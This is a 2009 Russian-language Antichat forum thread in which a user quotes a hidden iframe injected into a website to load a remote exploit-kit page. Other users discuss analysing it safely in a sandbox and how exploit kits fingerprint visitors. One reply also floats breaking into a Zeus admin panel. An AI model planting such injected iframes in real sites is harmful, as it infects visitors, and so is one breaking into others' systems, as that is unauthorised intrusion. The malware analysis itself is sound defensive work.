ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нашёл скрытый iframe.
  #1  
Старый 30.08.2009, 02:36
Аватар для Kornero
Kornero
Новичок
Регистрация: 31.12.2006
Сообщений: 25
Провел на форуме:
216389

Репутация: 10
По умолчанию Нашёл скрытый iframe.

На главной странице одного сайта нашёл такой код
Если я правильно всё понял, то эта какая-то бяка=)
Код:
<body bgcolor="#99AFC1" vlink="#DDDDDD" alink="#DDDDDD" link="#DDDDDD"><iframe src="http://u0b.ru:8080/index.php" width=190 height=168 style="visibility: hidden"></iframe>
НОД32 благополуно прошляпил. Самое странное что у меня запустилась ява машина...

Как можно без вреда для здоровья проверить что там грузится?
 
Ответить с цитированием

  #2  
Старый 30.08.2009, 03:49
Аватар для r00nix
r00nix
Познающий
Регистрация: 07.05.2009
Сообщений: 54
Провел на форуме:
487201

Репутация: 80
Отправить сообщение для r00nix с помощью ICQ
По умолчанию

Я для таких вещей всегда использую виртуалку, подключенную через нат, со свежеустановленной старой ХР и дырявым осликом на ней, а поверх виртуалки запускаю Wireshark. Тогда связка пробивает ослика (причем ты будешь знать, какими сплоентами, из пакетов, перехваченных шарком), и грузит исполняемый файл. А там уже может быть что угодно. Порой тоже интересное встречается) Особенно если там будет Zeus, то можно попробовать прочитать конфиги, залезть в админку и многое другое)
 
Ответить с цитированием

  #3  
Старый 30.08.2009, 19:09
Аватар для Kornero
Kornero
Новичок
Регистрация: 31.12.2006
Сообщений: 25
Провел на форуме:
216389

Репутация: 10
По умолчанию

2 r00nix
Спасибо за подсказу, в частности за софт ( Wireshark - прога гуд). Но только чёт у меня не получается =( Там какая-то защита стоит что один раз зашёл по ссылке, и дальше выдается пустая страница, но когда заходишь в первый раз, то пхпшный скрипт делает куда-то редирект, и потом запускается ява машина...я хз почему может какой ява аплет, я плохо знаю эту область...
Я так и не понял как скрипт блочит определённый комп...Ип менял все куки стёр, браузеры разные юзал. Но на след. день оно опять 1 раз сработала, а я проморгал =(

Если не сложно проверьте плиз кто-нить куда скрипт перекидывает дальше. Если бы эта хрень просто куки пёрла я был бы очень рад, но на кой тогда ява...
 
Ответить с цитированием

  #4  
Старый 31.08.2009, 10:11
Аватар для zannussi
zannussi
Познающий
Регистрация: 22.05.2008
Сообщений: 53
Провел на форуме:
824985

Репутация: 15
Отправить сообщение для zannussi с помощью ICQ
По умолчанию

Kornero,
большинство связок сейчас работают с базами, твой ип уже там, и куки у тебя. В настройках так же есть время, которое он будет не пускать неоригинальных пользователей на сплойт. Но странно, что ты поменял ип, стер куки, юзал другой браузер, а сплойт тебя опять куда-то редиректил без пробива. Ты писал про яву, может сплойт прочитал твой хдд-номер или еще какую инфу? хотя нафига такие навороты )
 
Ответить с цитированием

  #5  
Старый 15.10.2009, 01:52
Аватар для JOHNik
JOHNik
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521

Репутация: 34
Отправить сообщение для JOHNik с помощью ICQ
По умолчанию

Глянул, по крайней мере сейчас по этому адресу ничего нет, да и почему это он скрытый? он не скрытый!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Iframe заход раз в сутки Pycckoe1 PHP, PERL, MySQL, JavaScript 1 03.12.2008 12:29
RooT [iFRAME]'R - скрипт для вставки iframe JANE Разное - Покупка, продажа, обмен 20 18.02.2007 04:19
Скрипт проверки фтп на валидность и вставка iframe WaVeZ Разное - Покупка, продажа, обмен 1 10.10.2006 22:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ